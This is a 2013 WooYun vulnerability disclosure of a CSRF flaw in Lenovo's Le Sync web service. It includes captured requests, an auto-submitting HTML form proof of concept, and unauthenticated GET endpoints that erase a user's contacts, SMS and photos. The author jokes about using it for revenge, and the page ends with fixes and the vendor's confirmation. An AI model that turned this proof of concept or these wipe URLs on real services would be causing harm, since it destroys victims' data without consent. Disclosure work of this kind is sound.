当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038645

漏洞标题:联想乐同步超严重csrf(同步数据瞬间销毁)

相关厂商:联想

漏洞作者: 修码的马修

提交时间:2013-10-29 19:22

修复时间:2013-12-13 19:22

公开时间:2013-12-13 19:22

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-29: 细节已通知厂商并且等待厂商处理中
2013-10-31: 厂商已经确认,细节仅向厂商公开
2013-11-10: 细节向核心白帽子及相关领域专家公开
2013-11-20: 细节向普通白帽子公开
2013-11-30: 细节向实习白帽子公开
2013-12-13: 细节向公众公开

简要描述:

如果你非要说乐同步是安全专家,我只能说呵呵。

详细说明:

案发现场

sshot-3.png


先抓个包

POST /contact/contact/portal/create/contact HTTP/1.1
Host: pim.lenovo.com
Proxy-Connection: keep-alive
Content-Length: 62
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://pim.lenovo.com
X-Requested-With: XMLHttpRequest
User-Agent: ……
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://pim.lenovo.com/contact/portal/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
…………
NAME%C2%A7-1%C2%A9givenName=xsser&PHONE%C2%A7MOBILE%C2%B60=110


构造poc:

<html>
<body>
<form id="yun" name="yun" action="http://pim.lenovo.com/contact/contact/portal/create/contact" method="POST">
<input type="hidden" name="NAME§-1©givenName" value="波多" />
<input type="hidden" name="PHONE§MOBILE¶0" value="10086" />
<input type="submit" value="submit" />
</form>
<script>
   document.yun.submit(); 
</script>
</body>
</html>


返回代码:{"result":0,"data":12707736}

sshot-4.png


哈,如果你通讯录突然出现了女神的名字你会怎样?
然后我想了更邪恶的玩法,假如某人得罪了你,你用这个csrf让他触发,把他通讯录里的某人电话换成某人的电话……
可是经过验证修改联系人时需要联系人的id,也就是上面返回的”data“。
不用灰心,号称安全专家的乐同步为我们开辟了另一条邪恶的路—— 一键销毁,是不是听到名字就热血沸腾?好戏在后面!

sshot-5.png


姑且抓包试试,

POST /contact/contact/portal/clearAll/contact?rd=1380531868131 HTTP/1.1
Host: pim.lenovo.com
Proxy-Connection: keep-alive
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://pim.lenovo.com
X-Requested-With: XMLHttpRequest
User-Agent: ……
Referer: http://pim.lenovo.com/contact/contact/portal/user/setting.html?do=clear
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ……


我有一种直觉,这里用get也可以的,于是
联系人http://pim.lenovo.com/contact/contact/portal/clearAll/contact
短信http://pim.lenovo.com/sms/portal/clearAll
相片http://pim.lenovo.com/photoapi/v2/deleteall?
返回:{"result":0},再回去看看,干净的毛都没有!
可以看到的是,上面还有许多接口,时间关系没有一一列出,但相信csrf普遍存在。

漏洞证明:

要说的都说了,不信你自己点开试试,然后你就哭了。

修复方案:

1.加token,必须的,一键销毁竟然是get,改post
2.一键销毁要输入验证码,甚至是密码
3.这应用ui确实不错,但除了ui还有很多看不见的地方要关注,不然只会是砸了自己招牌。
4.如果有礼物我会很高兴,如果有20rank我也会很高兴

版权声明:转载请注明来源 修码的马修@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-10-31 13:07

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无

漏洞评价:

评论